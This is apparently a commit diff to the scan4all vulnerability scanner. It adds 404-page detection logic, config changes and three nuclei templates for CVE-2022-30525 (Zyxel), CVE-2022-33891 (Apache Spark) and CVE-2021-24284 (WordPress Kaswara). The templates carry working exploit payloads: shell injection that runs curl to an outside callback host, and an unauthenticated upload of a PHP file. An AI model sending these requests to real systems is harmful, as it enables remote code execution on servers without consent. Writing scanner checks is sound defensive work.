add CVE-2022-30525 CVE-2022-33891 CVE-2021-24284 2022-07-21

brute/dicts/404url.txt

@@ -3,4 +3,4 @@ error.html
 404.html
 500.html
 404.jsp
-500.jsp
+500.jsp

brute/dicts/fuzz404.txt

@@ -1,5 +1,6 @@
 <title>网站改版中</title>
 403
+<a href="/#/error/404">Found</a>
 404
 404 Not Found
 404.safedog.cn

brute/fuzzAI.go

@@ -2,12 +2,14 @@ package brute
 
 import (
 	_ "embed"
+	"encoding/json"
 	"github.com/antlabs/strsim"
 	"github.com/hktalent/scan4all/db"
 	"github.com/hktalent/scan4all/lib"
 	"github.com/hktalent/scan4all/pkg"
 	"github.com/hktalent/scan4all/pkg/fingerprint"
 	"gorm.io/gorm"
+	"net/url"
 	"regexp"
 	"strings"
 )
@@ -38,12 +40,21 @@ var fuzz404 string
 //go:embed dicts/404url.txt
 var sz404Url string
 
+var asz404UrlKey = "asz404Url"
+
 // 初始化字典到库中，且防止重复
 func init() {
 	fuzz404 = pkg.GetVal4File("fuzz404", fuzz404)
 	sz404Url = pkg.GetVal4File("404url", sz404Url)
 	page404Title = strings.Split(strings.TrimSpace(fuzz404), "\n")
 	asz404Url = strings.Split(strings.TrimSpace(sz404Url), "\n")
+	data, err := pkg.Cache1.Get(asz404UrlKey)
+	if nil == err && 0 < len(data) {
+		aT1 := asz404Url
+		if nil != json.Unmarshal(data, &asz404Url) {
+			asz404Url = aT1 // 容错
+		}
+	}
 	db.GetDb(&ErrPage{})
 }
 
@@ -116,6 +127,20 @@ func CheckIsErrPageAI(req *pkg.Response, page *Page) bool {
 				db.Create[ErrPage](data)
 				return true
 			}
+			u01, err := url.Parse(*page.Url)
+			if nil == err && 2 < len(u01.Path) {
+				// 加 404 url判断
+				if pkg.Contains4sub[string](asz404Url, u01.Path) {
+					return true
+				}
+				// 添加到 asz404Url, 保存到库中
+				if 404 == req.StatusCode {
+					go func() {
+						asz404Url = append(asz404Url, u01.Path)
+						pkg.PutAny[[]string](asz404UrlKey, asz404Url) // 404 path 缓存起来，永久复用
+					}()
+				}
+			}
 		}
 	}
 	return bRst

config/config.json

@@ -69,7 +69,7 @@
   "priorityNmap": true,
   "enableNuclei": false,
   "nuclei": {
-    "Severities": "critical,high,medium",
+    "Severities":  [5,4,3],
     "RateLimit": 150,
     "BulkSize":64,
     "TemplateThreads": 64,

config/config_me.json

@@ -58,6 +58,7 @@
   "naabu": {"TopPorts": "full","ScanAllIPS": true,"Threads": 64,"EnableProgressBar": false},
   "enableNuclei": true,
   "nuclei": {
+    "Severities":  [5,4,3],
     "RateLimit": 150,
     "BulkSize":64,
     "TemplateThreads": 64,

config/nuclei-templates/51pwn/CVE-2022-30525.yaml

@@ -0,0 +1,32 @@
+id: check_CVE-2022-30525
+
+info:
+  name: CVE-2022-30525
+  description: |+
+    doNuclei http://127.0.0.1:8080 CVE-2022-30525.yaml
+    nuclei -duc -validate -t 51pwn/CVE-2022-30525.yaml
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+  author: 51pwn
+  severity: medium
+  tags: web,zyxel,firewalls
+
+requests:
+  - raw:
+      - |+
+        POST /ztp/cgi-bin/handler HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Connection: close
+
+        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl `id`.rce.51pwn.com;","data":"hi"}
+
+    unsafe: true
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '(uid=[^\n]+)'
+        condition: and

config/nuclei-templates/51pwn/CVE-2022-33891.yaml

@@ -0,0 +1,43 @@
+id: Check_CVE-2022-33891
+
+info:
+  name: Apache Spark Shell Command Injection Vulnerability
+  author: 51pwnd
+  severity: critical
+  description: |
+    The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
+  reference:
+    - https://github.com/hktalent/nuclei-templates
+    - https://51pwn.com
+
+  tags: apache,spark
+
+requests:
+  - raw:
+      - |+
+        GET /?doAs=`curl%20http://{{interactsh-url}}/x` HTTP/1.1
+        Host: {{Host}}
+        Accept: */*
+        Connection: close
+
+    matchers-condition: and
+    unsafe: true
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      # - type: regex
+      #   part: interactsh_request
+      #   regex:
+      #     - '(uid.*)' # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 2
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' 
+
+# Enhanced by mp on 2022/05/27

config/nuclei-templates/cves/2021/CVE-2021-24284.yaml

@@ -0,0 +1,69 @@
+id: CVE-2021-24284
+
+info:
+  name: WordPress Kaswara Modern VC Addons - File Upload RCE
+  author: lamscun,pussycat0x,pdteam
+  severity: critical
+  description: |
+    The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.
+  reference:
+    - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
+    - https://github.com/advisories/GHSA-wqvg-8q49-hjc7
+    - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
+    - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/
+    - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24284
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24284
+    cwe-id: CWE-434
+  tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload
+
+variables:
+  zip_file: "{{to_lower(rand_text_alpha(6))}}"
+  php_file: "{{to_lower(rand_text_alpha(2))}}.php"
+  php_cmd: "<?php phpinfo();?>"
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708
+
+        --------------------------d3be34324392a708
+        Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip"
+        Content-Type: application/octet-stream
+
+        {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}
+        --------------------------d3be34324392a708
+        Content-Disposition: form-data; name="fontsetname"
+
+        {{zip_file}}
+        --------------------------d3be34324392a708
+        Content-Disposition: form-data; name="action"
+
+        uploadFontIcon
+        --------------------------d3be34324392a708--
+
+      - |
+        GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"
+
+      - type: word
+        part: body_2
+        words:
+          - "phpinfo()"
+
+      - type: status
+        status:
+          - 200

pkg/domain.go

@@ -3,6 +3,7 @@ package pkg
 import (
 	"crypto/tls"
 	"encoding/json"
+	"fmt"
 	"github.com/hktalent/scan4all/projectdiscovery/subfinder"
 	"reflect"
 	"strings"
@@ -18,6 +19,16 @@ func Contains[T any](a []T, s T) bool {
 	}
 	return false
 }
+func Contains4sub[T any](a []T, s T) bool {
+	s2 := fmt.Sprintf("%v", s)
+	for _, x := range a {
+		s1 := fmt.Sprintf("%v", x)
+		if -1 < strings.Index(s2, s1) {
+			return true
+		}
+	}
+	return false
+}
 
 func doAppend(a []string, s string) []string {
 	if !Contains[string](a, s) {

pocs_go/go_poc_check.go

@@ -283,7 +283,7 @@ func init() {
 					close(lib.PocCheck_pipe)
 					return
 				}
-				var f01 float32 = float32(nCnt/nMax) * 100
+				var f01 float32 = float32(nCnt) / float32(nMax) * float32(100)
 				fmt.Printf(" Asynchronous go PoCs detection task %%%0.2f ....\r", f01)
 				<-time.After(time.Duration(1) * time.Second)
 				nCnt += 1

test/nuclei/testNuclei.go

@@ -3,6 +3,8 @@ package main
 import (
 	"bytes"
 	"github.com/hktalent/scan4all/projectdiscovery/nuclei_Yaml"
+	"github.com/projectdiscovery/nuclei/v2/pkg/model/types/severity"
+	nucleiType "github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
 	_ "net/http/pprof"
 	"os"
 	"sync"
@@ -39,23 +41,28 @@ func main() {
 		//	fmt.Println("debug info: \nopen http://127.0.0.1:6060/debug/pprof/\n\ngo tool pprof -seconds=10 -http=:9999 http://localhost:6060/debug/pprof/heap")
 		//	http.ListenAndServe(":6060", nil)
 		//}()
+		h01 := []severity.Severity{severity.Critical, severity.High, severity.Medium}
+		//data1, err := json.Marshal(h01)
+		//if nil == err {
+		//	log.Printf("%+v", string(data1))
+		//}
 		buf := bytes.Buffer{}
 		var wg sync.WaitGroup
 		wg.Add(1)
 		buf.WriteString("http://192.168.10.31:8888\n")
 		pwd, _ := os.Getwd()
-		m1 := map[string]interface{}{"Severities": "critical,high,medium", "EnableProgressBar": false, "UpdateTemplates": false, "Templates": []string{pwd + "/config/nuclei-templates"}, "TemplatesDirectory": pwd + "/config/nuclei-templates", "NoUpdateTemplates": true}
+		m1 := map[string]interface{}{"Severities": h01, "EnableProgressBar": false, "UpdateTemplates": false, "Templates": []string{pwd + "/config/nuclei-templates"}, "TemplatesDirectory": pwd + "/config/nuclei-templates", "NoUpdateTemplates": true}
 		go DoNuclei(&buf, &wg, &m1)
 
 		buf1 := bytes.Buffer{}
 		buf1.WriteString("http://pms.yx4.me\n")
 		wg.Add(1)
-		m2 := map[string]interface{}{"Severities": "critical,high,medium", "EnableProgressBar": false, "Protocols": "http", "UpdateTemplates": false, "Templates": []string{pwd + "/config/nuclei-templates"}, "TemplatesDirectory": pwd + "/config/nuclei-templates", "NoUpdateTemplates": true}
+		m2 := map[string]interface{}{"Severities": h01, "EnableProgressBar": false, "Protocols": []nucleiType.ProtocolType{nucleiType.HTTPProtocol}, "UpdateTemplates": false, "Templates": []string{pwd + "/config/nuclei-templates"}, "TemplatesDirectory": pwd + "/config/nuclei-templates", "NoUpdateTemplates": true}
 		go DoNuclei(&buf1, &wg, &m2)
 
 		buf2 := bytes.Buffer{}
-		buf2.WriteString("http://192.168.10.240\n")
-		m3 := map[string]interface{}{"Severities": "critical,high,medium", "EnableProgressBar": false, "Protocols": "network", "UpdateTemplates": false, "Templates": []string{pwd + "/config/nuclei-templates"}, "TemplatesDirectory": pwd + "/config/nuclei-templates", "NoUpdateTemplates": true}
+		buf2.WriteString("https://kb.bugscan.net\n")
+		m3 := map[string]interface{}{"Severities": h01, "EnableProgressBar": false, "Protocols": []nucleiType.ProtocolType{nucleiType.NetworkProtocol}, "UpdateTemplates": false, "Templates": []string{pwd + "/config/nuclei-templates/51pwn"}, "TemplatesDirectory": pwd + "/config/nuclei-templates", "NoUpdateTemplates": true}
 		wg.Add(1)
 		go DoNuclei(&buf2, &wg, &m3)
 		wg.Wait()